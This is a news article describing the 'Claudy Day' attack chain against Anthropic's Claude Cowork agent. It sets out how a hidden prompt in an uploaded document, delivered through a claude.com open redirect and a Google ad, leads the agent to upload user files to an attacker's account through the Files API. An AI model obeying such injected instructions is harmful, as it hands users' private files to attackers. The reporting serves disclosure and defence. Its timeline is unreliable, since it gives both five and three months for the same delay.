Technology

Researchers Chain Prompt Injection and Files API Flaws to Silently Steal Claude User Data

A hidden prompt in an uploaded document silently triggered Claude to exfiltrate user files to an attacker's Anthropic account — a flaw Anthropic had dismissed five months earlier.

Tom Reznik4 min read
Published
Listen to this article0:00 min
Share this article:
Researchers Chain Prompt Injection and Files API Flaws to Silently Steal Claude User Data
AI-generated illustration

Security researchers demonstrated how Anthropic's Claude Cowork productivity agent can be tricked into stealing user files and uploading them to an attacker's account, exploiting a vulnerability the company allegedly knew about but left unpatched for three months.

The trio of flaws includes an invisible prompt injection via URL parameters on Claude.ai, a data exfiltration channel via the Anthropic Files API, and an open redirect on Claude.ai. Researchers at Oasis Security discovered the flaws, which when chained together in an attack dubbed "Claudy Day," "create a complete attack pipeline from targeted victim delivery to silent data exfiltration."

The attack chain starts when a user connects Cowork to a local folder containing sensitive information, uploads a document containing a hidden prompt injection, and the injected prompt triggers automatically when Cowork analyzes the files. The sandbox does allow connections to api.anthropic.com, and Oasis found that Anthropic's Files API, a beta feature that lets developers upload files to storage tied to their API account, was reachable from inside that sandbox. An attacker who embeds their own API key in the hidden prompt can instruct Claude to pull data from a user's conversation history, write it to a file, and upload it to the attacker's Anthropic storage. The attacker then retrieves the file at their leisure.

The open redirect rounded out the delivery chain. Oasis found an open redirect vulnerability on claude.com itself, meaning they could construct a URL that technically starts with the trusted claude.com domain, passes Google's ad approval process, and then quietly drops the user at an attacker-controlled page with the hidden injection already baked in. That redirect, combined with Google Ads' rule that an ad's display URL must match its destination's hostname, allowed researchers to construct a Google Search advertisement that showed a legitimate claude.com address but delivered users straight to the injected URL.

Neither Claude Haiku nor Anthropic's most capable model offered any resistance. PromptArmor researchers also discovered that Claude's API struggles when a file does not match the type it claims to be: when operating on a malformed PDF that is actually a text file, Claude throws API errors in every subsequent chat in the conversation, a failure researchers said could potentially be exploited through indirect prompt injection to cause a limited denial of service attack. By January 15, PromptArmor had published a proof-of-concept demonstrating how attackers could steal files containing loan estimates, financial data, and partial Social Security numbers through the same Files API flaw.

What makes the disclosure timeline particularly pointed is that the architectural flaw at the chain's core was not new. Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025, and the company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability. Anthropic reversed its stance five days later, on October 30, reopening the ticket and confirming that "data exfiltration vulnerabilities such as this one are in-scope for reporting, and this issue should not have been closed as out-of-scope." When Anthropic launched Cowork on January 13, nearly three months later, the Files API remained vulnerable despite the company expanding the tool to a broader, less technical user base.

The technique allows exfiltration of up to 30MB per file, according to Anthropic's API documentation, with no limit on the number of files that can be uploaded. Oasis noted the attack requires no additional infrastructure: "Claudy Day" chains three independent flaws into an attack pipeline from targeted victim delivery to silent data theft without requiring any integrations, tools, or MCP server configurations, and operates entirely within a default, out-of-the-box Claude.ai session.

Oasis reported its findings through Anthropic's Responsible Disclosure Program before publication and said the prompt injection issue has been fixed, with remaining issues currently being addressed. Anthropic told reporters that Cowork was released as a research preview with "unique risks due to its agentic nature and internet access," and plans to ship an update to the Cowork virtual machine to improve its interaction with the vulnerable API.

PromptArmor's researchers stressed that the root problem is structural, not a matter of model sophistication: prompt injection exploits architectural vulnerabilities rather than model intelligence gaps, meaning that no amount of reasoning capability provides a defense. Cowork was designed to interact with a user's entire work environment, including browsers and model context protocol servers that grant capabilities such as sending texts or controlling a Mac with AppleScripts, functions that increase the likelihood that the model will process sensitive and untrusted data sources users do not manually review, creating what PromptArmor describes as an ever-growing attack surface.

Know something we missed? Have a correction or additional information?

Submit a Tip

Never miss a story.
Get Prism News updates weekly.

The top stories delivered to your inbox.

Free forever · Unsubscribe anytime

Discussion

More in Technology